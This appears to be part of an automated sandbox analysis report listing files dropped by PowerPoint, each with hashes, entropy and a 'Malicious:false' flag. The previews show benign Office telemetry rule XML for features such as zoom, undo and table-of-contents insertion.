                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140115" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.PPTUndoActionsMainRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="140104" />.. <TI T="2" I="15min" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. <F T="5">.. <O T="EQ">.. <L>.. <S T="1" F="0" M="Ignore" />.. </L>.. <R>.. <V V="27" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="5">.. <F N="12" />.. <F N="13" />.. </S>.. </G>.. <C T="U32" I="0" O="true" N="UndoStrId">.. <S T="5" F="12" />.. </C>.. <C T="B" I="1" O="true" N="UndoStrIdIsTcid">.. <S T="5" F="13" />.. </C>.. <C T="U32" I="2" O="false" N="Occurrence">.. <A T="SUM">.. <S T="5" F="3" />.. </A>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1203
                                                                                                                              Entropy (8bit):4.949807346371998
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdLzcrc0/1+/GbaAQiervferkfermeryferMLvjE8nN/qHaSMg/mHhSMpz/E/c:2dHV6nirurNr5ryWrEvVMejL1XTkq
                                                                                                                              MD5:CB5CF39D268407112708131B842DD482
                                                                                                                              SHA1:E0C53AD3E20FC84C58505FD0795769E2710FB3FB
                                                                                                                              SHA-256:D32D2D344CB81A459D064DC7FEFE8411851E1D46E2B0347BEA9E93D11CCB156C
                                                                                                                              SHA-512:28C45E16AF8F620A3F45AEF0ED111BBE1F97B6B58D60BF94B9E16A04D8E9F8EB40B692BAE434337E4A8C807BDF87A4E525B3E161ADE7095BFC4CF9F619852302
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140116" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.PPTTableOfContentsInsertionRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdrpc" />.. <UTS T="2" Id="bdsjd" />.. <UTS T="3" Id="bdsjg" />.. <UTS T="4" Id="bdsjh" />.. <UTS T="5" Id="bdrpd" />.. <A T="6" E="TelemetrySuspend" />.. <A T="7" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="TableOfContentsInsertTOCButtonInvoked">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="TableOfContentsInsertionDialogLaunched">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="TableOfContentsInsertionDialogCancelled">.. <C>.. <S T="3" />.. </C>.. </C>.. <C T="U32" I="3" O="false" N="TableOfContentsInsertedUsingDialog">.. <C>.. <S T="4" />.. </C>.. </C>.. <C T="U32" I="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1931
                                                                                                                              Entropy (8bit):4.299462862937642
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dHNirPr6r+rGmwOfff/TZXJWULuV1+jD4iAWh1PJgr:cHkjWiSmtrlJLuV1IM4gr
                                                                                                                              MD5:C5BD320C1BB85C99AEE5D678A7846573
                                                                                                                              SHA1:146E8B1A93FCAAF5387B875FF970DEE9D183F2C9
                                                                                                                              SHA-256:413FAF0166E3021FD8654CF159B601F20C91EDE0DFE4B133232A3AE5CBD19CC8
                                                                                                                              SHA-512:70074BC1C776CE608F412E79E0BA28162D1C3ADC4EB153712BC2540E9F3859385225FCA233AB1D95B909B6093C3BA8C1C5592E4081F51F69353CD53F7EA20CAD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140117" V="2" DC="SM" EN="Office.PowerPoint.PPT.Desktop.Zoom.Navigation" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bcqn4" />.. <UTS T="2" Id="bf8pb" />.. <UTS T="3" Id="ax7kn" />.. <UTS T="4" Id="aq4c0" />.. <F T="5">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="4" F="Feature" />.. </L>.. <R>.. <V V="Show" T="W" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="4" F="Event" />.. </L>.. <R>.. <V V="Finish" T="W" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <F T="6">.. <O T="EQ">.. <L>.. <S T="3" F="cmd" />.. </L>.. <R>.. <V V="GoSlideById" T="W" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1034
                                                                                                                              Entropy (8bit):4.978098488313763
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdXrvj1+/GbaAQierLBOferIB6erpBVermNtajELvnb1jmHaSMW1jE/SHhSMpv:2dzLir1OWr8NrvArBghy5TPFt
                                                                                                                              MD5:F8F1568B658F20983D67DE6F103C1E9D
                                                                                                                              SHA1:FEFF93F9EDCE3A46DF91B2D315776E935162A472
                                                                                                                              SHA-256:25E5EDE000DC28AF38F4EDDC0ECE37E615182AD93B956C42794D1106C5C72B46
                                                                                                                              SHA-512:771BD742DB253407F5B7323FF3BB1359E00634AD07A2B86D3A7F28D0F085164EC0F91D2915D09A6FB8091437AFC09F40AB6777331DFF17226B267A68DF7FE294
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140119" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.PPTSectionLinkInsertionRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bedba" />.. <UTS T="2" Id="bedbg" />.. <UTS T="3" Id="bedbh" />.. <UTS T="4" Id="beh91" />.. <A T="5" E="TelemetrySuspend" />.. <A T="6" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="SectionLinkInsertionDialogLaunched">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="SectionLinkInsertionDialogCancelled">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="SectionLinkInsertedUsingDialog">.. <C>.. <S T="3" />.. </C>.. </C>.. <C T="U32" I="3" O="false" N="SectionLinkInsertionSuccess">.. <C>.. <S T="4" />.. </C>.. </C>.. <T>.. <S T="5" />.. <S T="6" />.. </T>.. <ST>.. <S T="1" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2653
                                                                                                                              Entropy (8bit):5.003925199667457
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cTcFEpIwh3hB+EcNP/tSHjzbUnnK7HDI1Ur+:EpZf2a6
                                                                                                                              MD5:B3C7A46F7152D5E4E1AF3AF1E070CE9C
                                                                                                                              SHA1:438AE375D532C8E3E664146FD6CC50E8C2E9474F
                                                                                                                              SHA-256:AD70D880F8077F61200BE845237242E38C1C8D0FA31F1F37B36385B24F3ACE1D
                                                                                                                              SHA-512:9D9673030A53C161F17320FF155F63B9D5116ACEB2960F0BCFF084D408CCC8BED98C663E49BD7BBBA618DA86DB96B5D88C1658D7BB7AA2986FC67C868A09FC0A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140120" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.PPTZoomLinksAutoRefreshRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="a0ym9" />.. <UTS T="2" Id="a0b1t" />.. <UTS T="3" Id="bfthx" />.. <UTS T="4" Id="bfthz" />.. <UTS T="5" Id="bfth1" />.. <UTS T="6" Id="bfth3" />.. <UTS T="7" Id="bfth4" />.. <UTS T="8" Id="bfth5" />.. <UTS T="9" Id="bfth7" />.. <UTS T="10" Id="bfth9" />.. <UTS T="11" Id="bftia" />.. <UTS T="12" Id="bhdz7" />.. <A T="13" E="TelemetrySuspend" />.. <A T="14" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="true" N="AvgThumbnailGeneratedAfterTimeDurationInMs">.. <A T="AVG">.. <S T="1" F="SlideDrawTime (ms)" M="Ignore" />.. </A>.. </C>.. <C T="U32" I="1" O="true" N="AvgThumbnailGeneratedInTimeDurationInMs">.. <A T="AVG">.. <S T="2" F="Sli
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):578
                                                                                                                              Entropy (8bit):5.132790536497373
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdh7y4gI9/GbaAQjersnxo7PNWOf/0//MyhmMNO2su:2ddy4gD3rbPJY
                                                                                                                              MD5:07F9CE237C47C1FA626C9FB921B66373
                                                                                                                              SHA1:49B36573FF09D4B54C96106F8DF0B4BAEB8F623D
                                                                                                                              SHA-256:9EBAA8ADF02AAE6A0F2022135F21355D852686CC4BBF1D63396273EC42C35CC5
                                                                                                                              SHA-512:50B168B0D09E38D562CC15760AF506FA4D100873EA0F5CA3B4587DB2F189F154127021081831E9AFEBBCEADFC494A46B96702D324F7D8DFA10A35A5E29C74F9C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140121" V="2" DC="SM" EN="Office.PowerPoint.PPT.HasUserEditedDocument" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bfeq8" />.. </S>.. <C T="G" I="0" O="true" N="CorrelationId">.. <O T="COALESCE">.. <L>.. <S T="1" F="CorrelationId" M="Ignore" />.. </L>.. <R>.. <S T="1" F="DocumentCorrelationId" M="Ignore" />.. </R>.. </O>.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1024
                                                                                                                              Entropy (8bit):4.9855463392163655
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdCJcrUf+/GbaAQier5NerZer/ereajELvn/5HaSMk7/SHhSMpJUHISMKeHfSI:2dCJnirSrEr2rLg/ncIGFt
                                                                                                                              MD5:820B6F4F2E966AD4BF05369CB2F24418
                                                                                                                              SHA1:CFFB8DB2420CE944920F089B273DF28F8C285AB7
                                                                                                                              SHA-256:DCD56D67C37FAEF51D8C5BF3A4FC385B2565CF6D4FF8056E127C8E4C4C706E57
                                                                                                                              SHA-512:BAF06BD8F0B2EE932AEEFA15F5D91155F27705F0AF93CFCB71B4B8F05026FEF45E6FA75F786FBDC34F16D53CA7FA3EB0B6B4E8ECFF96C1EA90D1AC62251A0CB4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140122" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.PPTSlideZoomInsertionRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bh7wc" />.. <UTS T="2" Id="bh7wd" />.. <UTS T="3" Id="bh7we" />.. <UTS T="4" Id="bh7v2" />.. <A T="5" E="TelemetrySuspend" />.. <A T="6" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="SlideZoomInsertionDialogLaunched">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="SlideZoomInsertionDialogCancelled">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="SlideZoomInsertedUsingDialog">.. <C>.. <S T="3" />.. </C>.. </C>.. <C T="U32" I="3" O="false" N="SlideZoomInsertionSuccess">.. <C>.. <S T="4" />.. </C>.. </C>.. <T>.. <S T="5" />.. <S T="6" />.. </T>.. <ST>.. <S T="1" />.. <S T
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1217
                                                                                                                              Entropy (8bit):4.968420990343637
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dHRrH6rEvrldrrqerTFrRDIJE4/5JvPgVVJ:cx2oTrfdx850J
                                                                                                                              MD5:1727F10007D7041CBEE4CE55861CFDE4
                                                                                                                              SHA1:46419E5FA22B3364F0695A637332C197A2DB30F4
                                                                                                                              SHA-256:927B9FB71B6B13797E6CD10BA296B9331C4A9431B0AB0C0836A04D52E43260F8
                                                                                                                              SHA-512:11F95DB1018632E0AA898CD1793F56B8F96CFC24CEC69BC13C6270D02CBDC6AA6467ABCC51F3A186493D967E256CA7E54E976800655E77759238F070BA14D56A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140123" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.AudioDeviceUsageInRPV" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="bil8j" />.. <UTS T="2" Id="bil8i" />.. <UTS T="3" Id="bixgr" />.. <UTS T="4" Id="bil99" />.. <UTS T="5" Id="bimaa" />.. <UTS T="6" Id="bfxo4" />.. </S>.. <C T="U8" I="0" O="false" N="AudioOff">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U8" I="1" O="false" N="NoAudioDevices">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="B" I="2" O="true" N="IsUserSelectedDevice">.. <S T="3" F="fUserHasSelectedDevice" M="Ignore" />.. </C>.. <C T="B" I="3" O="true" N="IsUserSelectedDefaultDevice">.. <S T="3" F="fUserHasSelectedDefaultDevice" M="Ignore" />.. </C>.. <C T="U8" I="4" O="false" N="SystemUseDefaultDevice">.. <C>.. <S T="4" />.. </C>.. </C>.. <C T="U8"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):853
                                                                                                                              Entropy (8bit):5.134623892075426
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd3rLv/GbaAQier8UtXOmynutnt4fEdwMnF92gO8ynHDg+3vqNxYNO2su:2dOir8UtX/k8d12BZqk
                                                                                                                              MD5:324430EC17151FED1D93918E97ED8A62
                                                                                                                              SHA1:275D2E0C428DFC98A3907BD57BD5786B05BB2B8D
                                                                                                                              SHA-256:7F4CE29EC4A271E7C6C9924C9F36E5204A2DBF449B986420F58B0D8F7E917FF0
                                                                                                                              SHA-512:E66492C43466555EE6639A92D5E3EF574772B7EB89B343264189C38C75903D7401D3C6AA0E80FB234F3AE81A9132D23A253F5B8D6C9A21D28C6F8293D40BF06D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140124" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.TextHighlighterUsage" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b5ot7" A="biibi" />.. </S>.. <C T="W" I="0" O="false" N="Color">.. <S T="1" F="Color" />.. </C>.. <C T="B" I="1" O="false" N="IsSelectedTextHighlighted">.. <S T="1" F="Highlighted Selected Text" />.. </C>.. <C T="B" I="2" O="false" N="IsEnteredHighlightMode">.. <S T="1" F="Entered Highlight Mode" />.. </C>.. <C T="B" I="3" O="false" N="IsNoColorSelected">.. <S T="1" F="No Color Selected" />.. </C>.. <C T="B" I="4" O="false" N="IsColorClearedByHighlightTwice">.. <S T="1" F="Color was cleared" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):554
                                                                                                                              Entropy (8bit):5.289882463660771
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdLrFDl+/GbaAQier/uRBfnqdOcuyNO2su:2d53ir/v
                                                                                                                              MD5:763E287700C95B57F70789D632A23045
                                                                                                                              SHA1:08862CF59173F78ED42F4246A43EC581B577006A
                                                                                                                              SHA-256:1708C07808582263A77604BC5CB278995D8E8F7457C7F48278C6E6174F7AFF93
                                                                                                                              SHA-512:1206D569F807FC04B52138FEA29B64E1BBF76332F06BFC62CF69ADAEDA1AB2875E0F97C7FFF4357514A6D8A4DF35B8A582CF42C05B458EA1827A5D1FFB9BCF15
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140125" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.SummaryZoomInsertionRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bdsjh" />.. </S>.. <C T="B" I="0" O="false" N="SectionsPresent">.. <S T="1" F="SectionsPresent" />.. </C>.. <C T="B" I="1" O="false" N="KeepSectionCheckBoxSelected">.. <S T="1" F="KeepSectionCheckBoxSelected" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):828
                                                                                                                              Entropy (8bit):5.092598990133606
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdOAvrMFtBg/GbaAQieroLO+yXCWZTMWrX0TMpJlXSTMTnfhN1x06X1aNO2su:2ddyt5irh+ySWZLEUlCS1e6s
                                                                                                                              MD5:69650A0E0C9023C3256536064684BD9C
                                                                                                                              SHA1:4F5C6D404D18917F6444D8AEE04C2408140C3DC6
                                                                                                                              SHA-256:492481400691A6069553FC206FBC472016CD2145D2944C5A07E48DDB7E2BDF7B
                                                                                                                              SHA-512:DCE12B57BB126619802D7D7AF5720D4F2CE3AA02E7BC821A72E2A8071A644515D1F03FDFD23554549CB21BC56B83A4B7BE014D1D2F15C34B6F821CE0A4EC5F54
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140126" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.ZoomCountOnCloseRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjd1p" />.. </S>.. <C T="U32" I="0" O="false" N="SummaryZoomCount">.. <S T="1" F="Summary Zoom Count" />.. </C>.. <C T="U32" I="1" O="false" N="SectionZoomCount">.. <S T="1" F="Section Zoom Count" />.. </C>.. <C T="U32" I="2" O="false" N="SlideZoomCount">.. <S T="1" F="Slide Zoom Count" />.. </C>.. <C T="G" I="3" O="true" N="DocumentId">.. <S T="1" F="CorrelationId" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="SlideCount">.. <S T="1" F="Slide Count" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):989
                                                                                                                              Entropy (8bit):5.093481470033898
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdYrFtBg/GbaAQierbMMf/xno1X1xntXLnVOUPynHDayXTxnAL6MgnfhNO2su:2ds5irgMHK5/PAhDGWB
                                                                                                                              MD5:6D45B616B9BE1AA5B30D5D560A432040
                                                                                                                              SHA1:0C43AEE433E1DFDDF2E1493D2B5FE70C805411EE
                                                                                                                              SHA-256:1919F1C3C22027ED84E457930DB5AA9852185DE2D2A308046DA899594A6FF7B3
                                                                                                                              SHA-512:3B912B7F238BBFAAB0385B75209C67BC6D33F92D519B12CB89B58424818BA6F7B76817774301A9704D05E8654076F4B12DB312E78B1163902A02B287A9535F82
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140127" V="1" DC="SM" EN="Office.PowerPoint.PPT.Desktop.ZoomInfoOnCloseRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjd1m" />.. </S>.. <C T="U32" I="0" O="false" N="ZoomType">.. <S T="1" F="Zoom Type" />.. </C>.. <C T="B" I="1" O="false" N="SlideTransparent">.. <S T="1" F="SlideTransparent" />.. </C>.. <C T="B" I="2" O="false" N="ShowBackground">.. <S T="1" F="ShowBackground" />.. </C>.. <C T="B" I="3" O="false" N="UserCoverImage">.. <S T="1" F="UserCoverImage" />.. </C>.. <C T="B" I="4" O="false" N="ReturnToParent">.. <S T="1" F="ReturnToParent" />.. </C>.. <C T="B" I="5" O="false" N="TransistionEnabled">.. <S T="1" F="TransistionEnabled" />.. </C>.. <C T="G" I="6" O="true" N="DocumentId">.. <S T="1" F="CorrelationId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):733
                                                                                                                              Entropy (8bit):5.18696905694695
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd2rTS/GbSerEHeEXveTMpXxMp9jeEXUcjeTMn9vj4WNUTvj3NO2su:2d8Fr+eEfem6jeEEcje2PKHd
                                                                                                                              MD5:9F2913E7FACB05FD1E9EF9604A43BA66
                                                                                                                              SHA1:2F374EAA0B175C9415CC7BCE705DB8655256F080
                                                                                                                              SHA-256:6F1FE0BFCD35F32753FD74B17E39EFFE00B66A2D13F6FC0A4CDA33A68FD46A6D
                                                                                                                              SHA-512:5C266D59D8ADF882D118200F08120BE4F98D7C1D923F1DAEFD8E08A749D90A4690046698D5BBD4E2CC3AFF32EBDC83F2F319A478C3B649EA2769E122E55EECA5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140128" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.ThemeGalleryCount" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjavl" />.. </S>.. <C T="U32" I="0" O="false" N="DuplicateThemeCount">.. <S T="1" F="DuplicateThemeCount" />.. </C>.. <C T="U32" I="1" O="false" N="TotalDuplicateCount">.. <S T="1" F="TotalDuplicateCount" />.. </C>.. <C T="U32" I="2" O="false" N="UniqueThemeCount">.. <S T="1" F="UniqueThemeCount" />.. </C>.. <C T="B" I="3" O="false" N="UsingDocumentTemplateService">.. <S T="1" F="UsingDocumentTemplateService" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):578
                                                                                                                              Entropy (8bit):5.187467731194211
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdPrx9g/GbaAQier3XFJjEQyuPf8XHaSMNO5AHNUlu:2d/irnvLY07
                                                                                                                              MD5:D222B3E499C4AAED87D92AD33E9D0681
                                                                                                                              SHA1:83E8F2A88FD993DB63C8AA5D095CB33A6F097408
                                                                                                                              SHA-256:CE798600D917B3B339112C8F8CBCE05F030E4C11350236D3B32FF4F0BCE0654A
                                                                                                                              SHA-512:3EC522D8BDB74966E6B0D0D37E3EFBE83629C1DB45EE4B73F43854CD7DBE1079F0C515E9B439AAD012B73F0070E62AACAABB41E566BE94C4AF0D4ABEE11F3306
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140129" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.ZoomChangeImageRule" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bhsfp" />.. <A T="2" E="TelemetrySuspend" />.. <A T="3" E="TelemetryShutdown" />.. </S>.. <C T="U8" I="0" O="false" N="ZoomChangeImageDialogCancelCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1198
                                                                                                                              Entropy (8bit):4.878593802257296
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHddrWg/GbaAQier2erASerhuLZH5GwYZH56+ZHrOHHf6XZHgHMfHHgHwxn9/bH:2d4rirJrYrhGf4VkHM4HwftvF
                                                                                                                              MD5:2BF09E4547E348FE2130232732519150
                                                                                                                              SHA1:993DEA7D7CA84475D867A38FDFDF1CB9EF33A5C8
                                                                                                                              SHA-256:5083904890218A0CA62546C9D4796BBD992C11D45885A50F3A20ABBE25D3B693
                                                                                                                              SHA-512:25ACAF1FE51762987DEE99133505C5F005804500330080D20E44D73C1BEBF98173F85E27D9652361C199CD597CE89E3AF7A93EDB1461E44FF814FA93CA3E8A05
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="140130" V="0" DC="SM" EN="Office.PowerPoint.PPT.Desktop.RecordRibbon" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjxvh" />.. <UTS T="2" Id="bjxvf" />.. <UTS T="3" Id="bjxvi" />.. </S>.. <C T="B" I="0" O="false" N="IsRecordingRibbonTabVisible">.. <S T="1" F="fRecordingRibbonTabVisible" />.. </C>.. <C T="U32" I="1" O="false" N="RecordingRibbonTabGroupPolicyValue">.. <S T="1" F="recordingRibbonTabGroupPolicy" />.. </C>.. <C T="I8" I="2" O="false" N="RecordingRibbonTabState">.. <S T="1" F="recordingRibbonTabState" />.. </C>.. <C T="B" I="3" O="false" N="IsRecordPresenterViewLaunched">.. <O T="GT">.. <L>.. <C>.. <S T="2" />.. </C>.. </L>.. <R>.. <V V="0" T="I8" />.. </R>.. </O>.. </C>.. <C T="B" I="4" O="false" N="IsRibbonToolBarLoaded">.. <O T="GT">.
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):640
                                                                                                                              Entropy (8bit):5.2688169763676305
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdULrqZE/GbaAQier5upjNyMnoOIavMnt4UVLNO2su:2dJZfirXlG6
                                                                                                                              MD5:52A008B153DC2AD3665A7DA8C8A9E037
                                                                                                                              SHA1:1209EA926C0C779F6D22D6BD92741327AB8CC32E
                                                                                                                              SHA-256:110C2C1DB840AB3277879D4DD5E2DB6D3801E3BDBB542DE830E08C9C61EF25C9
